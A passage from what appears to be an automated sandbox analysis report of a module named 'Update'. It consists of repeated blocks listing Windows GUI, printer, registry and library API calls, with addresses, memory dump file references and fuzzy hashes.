                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Enable$Active$CaptureEnabledHookMessageSendUnhookWindows
                                              • String ID:
                                              • API String ID: 1281840512-0
                                              • Opcode ID: 1ca408319148c5ba9c2078296911ee66d892d1b0aaf075c21f48ce0368e4a7d3
                                              • Instruction ID: f318fe48bb06ca244e9f619fa2de85e1f1e51053150e8af6ca1e840a8f0fc004
                                              • Opcode Fuzzy Hash: 1ca408319148c5ba9c2078296911ee66d892d1b0aaf075c21f48ce0368e4a7d3
                                              • Instruction Fuzzy Hash: 36518370B01706ABEB049F74C848BADBBF8BF16319F144618E526E7A80DF74E416DB90
                                              APIs
                                              • GetClientRect.USER32(?,?), ref: 6C1D4D95
                                              • BeginDeferWindowPos.USER32(00000008), ref: 6C1D4DAB
                                              • GetTopWindow.USER32(?), ref: 6C1D4DBC
                                              • GetDlgCtrlID.USER32(00000000), ref: 6C1D4DC5
                                              • SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 6C1D4DFD
                                              • GetWindow.USER32(00000000,00000002), ref: 6C1D4E06
                                              • CopyRect.USER32(?,?), ref: 6C1D4E21
                                              • EndDeferWindowPos.USER32(00000000), ref: 6C1D4EB1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                              • String ID:
                                              • API String ID: 1228040700-0
                                              • Opcode ID: 5ef69e79b0de4b8bd03471a50b975c6da377af0359e45a504fed311854425ec5
                                              • Instruction ID: f35f25d574efbabc943cde997931ebedf5e51fa73c8fdfd00a9a7bbf19d4d8c1
                                              • Opcode Fuzzy Hash: 5ef69e79b0de4b8bd03471a50b975c6da377af0359e45a504fed311854425ec5
                                              • Instruction Fuzzy Hash: 02512931A01219EFDF00CFA8C884BDEB7B9BF5A315F168059E815BB640C779A940CBA1
                                              APIs
                                                • Part of subcall function 6C257E2D: ReleaseCapture.USER32 ref: 6C257E64
                                                • Part of subcall function 6C257E2D: IsWindow.USER32(?), ref: 6C257E93
                                                • Part of subcall function 6C257E2D: DestroyWindow.USER32(?), ref: 6C257EA3
                                              • SetRectEmpty.USER32(?), ref: 6C200A2B
                                              • ReleaseCapture.USER32 ref: 6C200A31
                                              • SetCapture.USER32(?,?,?,?,6C1F89A2,?), ref: 6C200A44
                                              • GetCapture.USER32 ref: 6C200A83
                                              • ReleaseCapture.USER32 ref: 6C200A93
                                              • SetCapture.USER32(?,?,?,?,6C1F89A2,?), ref: 6C200AA6
                                              • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C200B44
                                              • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C200B91
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Capture$Window$Release$Redraw$DestroyEmptyRect
                                              • String ID:
                                              • API String ID: 2209428161-0
                                              • Opcode ID: cff623c7bb41825001f2af5022009bcbb2b28d31e202b3d043dbfe785aceb75e
                                              • Instruction ID: 76e18478a9ffa8de1c2409e5f52f01c84d461b5c0cdbec26b35f3c77cd2c377e
                                              • Opcode Fuzzy Hash: cff623c7bb41825001f2af5022009bcbb2b28d31e202b3d043dbfe785aceb75e
                                              • Instruction Fuzzy Hash: 5F41B131701656AFEB04DF74C884B9EBBBDFF45319F10026AE92AC3690DB30A915CB91
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C23E9AF
                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C23E9C8
                                              • DestroyAcceleratorTable.USER32(?), ref: 6C23EA09
                                              • GetTopWindow.USER32(?), ref: 6C23EA2B
                                              • GetWindow.USER32(?,00000002), ref: 6C23EA43
                                              • IsWindow.USER32(?), ref: 6C23EA60
                                              • GetParent.USER32(?), ref: 6C23EA6B
                                              • DestroyWindow.USER32(?), ref: 6C23EA77
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Destroy$AcceleratorH_prolog3MessageParentSendTable
                                              • String ID:
                                              • API String ID: 271420684-0
                                              • Opcode ID: 85d5802835c3baae7e6e669f7f37e2774b87ca0be6c426c7016d0af1a9ddaf49
                                              • Instruction ID: 4e64dfdedb83d0e5a393dc78a29c367f651a29d623b446650f80f5a69eea1c4f
                                              • Opcode Fuzzy Hash: 85d5802835c3baae7e6e669f7f37e2774b87ca0be6c426c7016d0af1a9ddaf49
                                              • Instruction Fuzzy Hash: 3421A971601609DBEB119FB0C848BDE7BB9BF8A315F541018F85AA7A50DF30A819CBA1
                                              APIs
                                              • GlobalLock.KERNEL32(00000000), ref: 6C1D2E30
                                              • lstrcmpW.KERNEL32(00000000,?), ref: 6C1D2E49
                                              • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6C1D2E5E
                                              • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C1D2E7E
                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C1D2E86
                                              • GlobalLock.KERNEL32(00000000), ref: 6C1D2E94
                                              • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6C1D2EA5
                                              • ClosePrinter.WINSPOOL.DRV(?), ref: 6C1D2EBD
                                                • Part of subcall function 6C1E9896: GlobalFlags.KERNEL32(?), ref: 6C1E98A3
                                                • Part of subcall function 6C1E9896: GlobalUnlock.KERNEL32(?), ref: 6C1E98B1
                                                • Part of subcall function 6C1E9896: GlobalFree.KERNEL32(?), ref: 6C1E98BD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                              • String ID:
                                              • API String ID: 168474834-0
                                              • Opcode ID: 4d452c9679f2dfde9a0440024259651cb9881d79822b16b2b09651c1f7602db5
                                              • Instruction ID: c59e63c895cfccc6dcab53a312934a671a57c1458bb5c96eee22eeebbc6530f4
                                              • Opcode Fuzzy Hash: 4d452c9679f2dfde9a0440024259651cb9881d79822b16b2b09651c1f7602db5
                                              • Instruction Fuzzy Hash: 12119DB1501609BEEF125FA1CD88EAB7BFDEF00748B110429B62295931D731EE50EB70
                                              APIs
                                              • GetSystemMetrics.USER32(0000000B), ref: 6C1ECAD5
                                              • GetSystemMetrics.USER32(0000000C), ref: 6C1ECAE0
                                              • GetSystemMetrics.USER32(00000002), ref: 6C1ECAEB
                                              • GetSystemMetrics.USER32(00000003), ref: 6C1ECAF9
                                              • GetDC.USER32(00000000), ref: 6C1ECB07
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 6C1ECB12
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6C1ECB1E
                                              • ReleaseDC.USER32(00000000,00000000), ref: 6C1ECB2A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1151147025-0
                                              • Opcode ID: 06724b1d01a2b42ba914fef3c3503270f819906a78f75efc88268bf95093a9b3
                                              • Instruction ID: a3e2a19c4249680e3d0abfe7f519bca739ab67d0dbf03128c3fba84f8c484136
                                              • Opcode Fuzzy Hash: 06724b1d01a2b42ba914fef3c3503270f819906a78f75efc88268bf95093a9b3
                                              • Instruction Fuzzy Hash: 34F09D75B82714ABEB106FB1980DB5A7A78FB57B12F00492AF603DA580DBB585118F90
                                              APIs
                                                • Part of subcall function 6C1E07A6: GetParent.USER32(00000024), ref: 6C1E0803
                                                • Part of subcall function 6C1E07A6: GetLastActivePopup.USER32(00000024), ref: 6C1E0816
                                                • Part of subcall function 6C1E07A6: IsWindowEnabled.USER32(00000024), ref: 6C1E082A
                                                • Part of subcall function 6C1E07A6: EnableWindow.USER32(00000024,00000000), ref: 6C1E083D
                                              • EnableWindow.USER32(?,00000001), ref: 6C1E08C5
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 6C1E08DB
                                              • GetCurrentProcessId.KERNEL32 ref: 6C1E08E5
                                              • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C1E08FB
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 6C1E0986
                                              • MessageBoxW.USER32(?,?,?,6C1C7FF4), ref: 6C1E09A8
                                              • EnableWindow.USER32(00000000,00000001), ref: 6C1E09CD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
                                              • String ID:
                                              • API String ID: 1924968399-0
                                              • Opcode ID: f5ba9e4eeeff9759c6ec256502a564f6adb447bea25b7cd078cc36aa57e26d67
                                              • Instruction ID: 0d067257ff437bc4ef3d99637c01fc36db635036989094ef6b9089d49662c719
                                              • Opcode Fuzzy Hash: f5ba9e4eeeff9759c6ec256502a564f6adb447bea25b7cd078cc36aa57e26d67
                                              • Instruction Fuzzy Hash: 4F41A171A4265D9BEB10CF28CC88BEAB7B8EB19704F1001A9E51DE7640DB70DE80DF50
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C1E4C6C
                                              • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 6C1E4D71
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C1E4D8E
                                              • RegCloseKey.ADVAPI32(?), ref: 6C1E4DAF
                                              • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6C1E4DCA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CloseEnumH_prolog3_OpenQueryValue
                                              • String ID: Software\
                                              • API String ID: 1666054129-964853688
                                              • Opcode ID: ce30ce1d80eb6b13e2fca59bec642cc06a5d24aaff04c4c8cf0fa00faa92aa89
                                              • Instruction ID: d7ba081e338f976181764f82cf4f603d7215abefef212e7c28c279b1718e4252
                                              • Opcode Fuzzy Hash: ce30ce1d80eb6b13e2fca59bec642cc06a5d24aaff04c4c8cf0fa00faa92aa89
                                              • Instruction Fuzzy Hash: 6F412E72902569ABDF209BE4DC98BEE76BCAF19318F1401A9E505E3640DB349E84CF54
                                              APIs
                                              • __EH_prolog3_catch_GS.LIBCMT ref: 6C1E4ACB
                                              • RegOpenKeyExW.ADVAPI32(?,00000010,00000000,0002001F,?,00000228), ref: 6C1E4B71
                                                • Part of subcall function 6C1E49FF: __EH_prolog3.LIBCMT ref: 6C1E4A06
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C1E4B95
                                              • RegCloseKey.ADVAPI32(?), ref: 6C1E4C4A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CloseEnumH_prolog3H_prolog3_catch_Open
                                              • String ID: Software\Classes\
                                              • API String ID: 854624316-1121929649
                                              • Opcode ID: 0b8885aca04c8ec0af8e68503fcb99dab2f9d7017d8183ef6ac71898eb781091
                                              • Instruction ID: 3ea0c370a31f44bc1ad102944eba7d1c328630c1a5023304da5b44dbd2fc7d67
                                              • Opcode Fuzzy Hash: 0b8885aca04c8ec0af8e68503fcb99dab2f9d7017d8183ef6ac71898eb781091
                                              • Instruction Fuzzy Hash: 4F419F36A01618ABDF11DBA4D888BDDB7B9AF58318F2441D5E909A7741CB349A48CB11
                                              APIs
                                              • SetFocus.USER32(00000000,00000000), ref: 6C1DE9B3
                                              • GetParent.USER32(?), ref: 6C1DE9C1
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 6C1DE9DC
                                              • GetCurrentProcessId.KERNEL32 ref: 6C1DE9E2
                                              • GetActiveWindow.USER32 ref: 6C1DEA41
                                              • SendMessageW.USER32(?,00000006,00000001,00000000), ref: 6C1DEA52
                                              • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 6C1DEA6C
                                                • Part of subcall function 6C1E525D: EnableWindow.USER32(?,00000024), ref: 6C1E526E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                              • String ID:
                                              • API String ID: 2169720751-0
                                              • Opcode ID: fa855814623c5f02794c2cf70825903aa0d13bd80c9606a4c1d604faad28fab0
                                              • Instruction ID: 6f479dcba5ebe408def2ebbcf03604242904c5f74ed19531647eb98e97d491c2
                                              • Opcode Fuzzy Hash: fa855814623c5f02794c2cf70825903aa0d13bd80c9606a4c1d604faad28fab0
                                              • Instruction Fuzzy Hash: 9231D031341209EBEF159B20CC88B9CBBB9BF13746F214194F5429BAD0CBB4BA448B91
                                              APIs
                                              • LockWindowUpdate.USER32(00000000,00000004,00000004), ref: 6C238A63
                                              • ValidateRect.USER32(?,00000000,0000E800), ref: 6C238A9F
                                              • UpdateWindow.USER32(?), ref: 6C238AA8
                                              • LockWindowUpdate.USER32(00000000), ref: 6C238AB9
                                              • ValidateRect.USER32(?,00000000,0000E800), ref: 6C238AE7
                                              • UpdateWindow.USER32(?), ref: 6C238AF0
                                              • LockWindowUpdate.USER32(00000000), ref: 6C238B01
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: UpdateWindow$Lock$RectValidate
                                              • String ID:
                                              • API String ID: 797752328-0
                                              • Opcode ID: 1680a68cf9fc053f60e6496facabd0dc117a75614b38b460e2fdab1a9999ad57
                                              • Instruction ID: 2cf684a0758c6b426c55494af3b71bbe39879c64163809ac573f5770875abda0
                                              • Opcode Fuzzy Hash: 1680a68cf9fc053f60e6496facabd0dc117a75614b38b460e2fdab1a9999ad57
                                              • Instruction Fuzzy Hash: C0318FB660171AEFDB008F64C844B4A7BB5FB45745F21556BFC5ADB690EB70E900CB10
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1D4ED2
                                              • GetTopWindow.USER32(?), ref: 6C1D4EFF
                                              • GetDlgCtrlID.USER32(00000000), ref: 6C1D4F11
                                              • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 6C1D4F6C
                                              • GetWindow.USER32(00000000,00000002), ref: 6C1D4FAE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$CtrlH_prolog3MessageSend
                                              • String ID: pt4l
                                              • API String ID: 849854284-3870122376
                                              • Opcode ID: 7d32d7f93bf73557df7509c8115c1ec9be50fae62ce4efcd97e6561cb142be24
                                              • Instruction ID: aa1078aa7e5ffbdba1dc25c97cadbea2c76a374e4e2d0419737e12dd144d9ce1
                                              • Opcode Fuzzy Hash: 7d32d7f93bf73557df7509c8115c1ec9be50fae62ce4efcd97e6561cb142be24
                                              • Instruction Fuzzy Hash: 2E210835902618ABEF128F65CD40FEEB7BABF56308F110195F915E2A60DF30AE04CB52
                                              APIs
                                              • FreeLibrary.KERNEL32(00000000,?,6C324A6C,6C1B22CA,00000000,00000000,6C1E5BE4,6C1B22CC,?,6C3245C6,00000022,FlsSetValue,6C36C124,6C36C12C,6C1E5BE4), ref: 6C324A1E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: api-ms-$ext-ms-
                                              • API String ID: 3664257935-537541572
                                              • Opcode ID: 3af807477b7569c8c4d3b98149f70849b2813099cf3db89d5d55e4afe43402d6
                                              • Instruction ID: 2777d6790a1c54e1fd16ba8729a40b842460fd8e93f034cd2b02d7064929eef0
                                              • Opcode Fuzzy Hash: 3af807477b7569c8c4d3b98149f70849b2813099cf3db89d5d55e4afe43402d6
                                              • Instruction Fuzzy Hash: 87210A36B02251ABDF119B65DC84A8F37BC9B437A8F250214E855B7A80D73AED04CEE4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Destroy$AcceleratorH_prolog3ParentTable
                                              • String ID:
                                              • API String ID: 2502036937-0
                                              • Opcode ID: 71349e342e838eb5ec0b42dc5dbbec2b1539098cc9c5d51d2a99565dcd7eb8d4
                                              • Instruction ID: cc0b4853c11c9a72d6ce3e671e7b9c797104624eec491e49f819993207cce16b
                                              • Opcode Fuzzy Hash: 71349e342e838eb5ec0b42dc5dbbec2b1539098cc9c5d51d2a99565dcd7eb8d4
                                              • Instruction Fuzzy Hash: BB21F4B16007299BEB11BF61CC84B8E77B5BF49709F502619FC5AA7A40CF30E504CB21
                                              APIs
                                              • GetParent.USER32(?), ref: 6C1D8CC6
                                              • GetWindowRect.USER32(?,?), ref: 6C1D8CE4
                                              • ScreenToClient.USER32(?,?), ref: 6C1D8CF1
